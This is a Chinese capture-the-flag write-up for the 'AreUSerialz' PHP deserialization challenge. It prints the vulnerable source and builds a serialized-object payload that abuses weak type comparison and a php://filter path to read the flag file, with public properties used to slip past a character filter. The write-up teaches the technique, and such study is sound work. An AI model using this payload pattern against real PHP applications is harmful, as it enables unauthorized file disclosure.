码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [网鼎杯 2020 青龙组]AreUSerialz


    直接得到代码

    1. include("flag.php");
    2. highlight_file(__FILE__);
    3. class FileHandler {
    4. protected $op;
    5. protected $filename;
    6. protected $content;
    7. function __construct() {
    8. $op = "1";
    9. $filename = "/tmp/tmpfile";
    10. $content = "Hello World!";
    11. $this->process();
    12. }
    13. public function process() {
    14. if($this->op == "1") {
    15. $this->write();
    16. } else if($this->op == "2") {
    17. $res = $this->read();
    18. $this->output($res);
    19. } else {
    20. $this->output("Bad Hacker!");
    21. }
    22. }
    23. private function write() {
    24. if(isset($this->filename) && isset($this->content)) {
    25. if(strlen((string)$this->content) > 100) {
    26. $this->output("Too long!");
    27. die();
    28. }
    29. $res = file_put_contents($this->filename, $this->content);
    30. if($res) $this->output("Successful!");
    31. else $this->output("Failed!");
    32. } else {
    33. $this->output("Failed!");
    34. }
    35. }
    36. private function read() {
    37. $res = "";
    38. if(isset($this->filename)) {
    39. $res = file_get_contents($this->filename);
    40. }
    41. return $res;
    42. }
    43. private function output($s) {
    44. echo "[Result]:
      "
      ;
    45. echo $s;
    46. }
    47. function __destruct() {
    48. if($this->op === "2")
    49. $this->op = "1";
    50. $this->content = "";
    51. $this->process();
    52. }
    53. }
    54. function is_valid($s) {
    55. for($i = 0; $i < strlen($s); $i++)
    56. if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
    57. return false;
    58. return true;
    59. }
    60. if(isset($_GET{'str'})) {
    61. $str = (string)$_GET['str'];
    62. if(is_valid($str)) {
    63. $obj = unserialize($str);
    64. }
    65. }

    发现函数is_valid,里面的ord函数:

    说明这里get传入的str值的ASCII码值在32-125之间

    再看

    这里的对于op的强类型判断等于2,我们直接让op等于数字2即可绕过,然后调用process方法

    再看process方法:

    这里对于op又是弱类型比较,当op等于2时,调用read方法

    再看read方法

    很明显,这里有file_get_contents方法,可以被我们利用

    开始构造payload:

    1. class FileHandler {
    2. protected $op = 2;
    3. protected $filename = 'php://filter/convert.base64-encode/resource=flag.php';
    4. protected $content = 123;
    5. }
    6. echo serialize(new FileHandler);

    因为这里的成员都是protected类型,直接打印会出现不可见字符,所以需要url编码

    但是,前面还说到了ASCII码的要求,这里的不可见字符其实是\x00,它的ASCII为0

    知识点:PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过

    修改payload为:

    1. class FileHandler {
    2. public $op = 2;
    3. public $filename = 'php://filter/convert.base64-encode/resource=flag.php';
    4. public $content = 123;
    5. }
    6. echo serialize(new FileHandler);

    然后将得到的内容进行base64解码即可得到flag

  • 相关阅读:
    YOLOv9改进策略 | 添加注意力篇 | LSKAttention大核注意力机制助力极限涨点 (附多个位置添加教程)
    ATV32变频器在堆垛机应用
    架构问题:技术选型
    【LeetCode每日一题:809.情感丰富的文字~~~双指针+计数器】
    FreeRTOS学习笔记-基于stm32(8)信号量总结(二值信号量、计数型信号量、互斥信号量、优先级翻转、优先级继承)
    HCNP Routing&Switching之ARP安全
    EasyPoi——导出导入表格数据工具
    GD32E103 USB官方库 + STM32CubeMX
    牛客多校第6场赛后学习 B(两种做法)G(两种做法)M(两种写法)J
    【Linux】宝塔面板设置MySQL慢查询日志,未走索引日志
  • 原文地址:https://blog.csdn.net/Yb_140/article/details/126787425
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号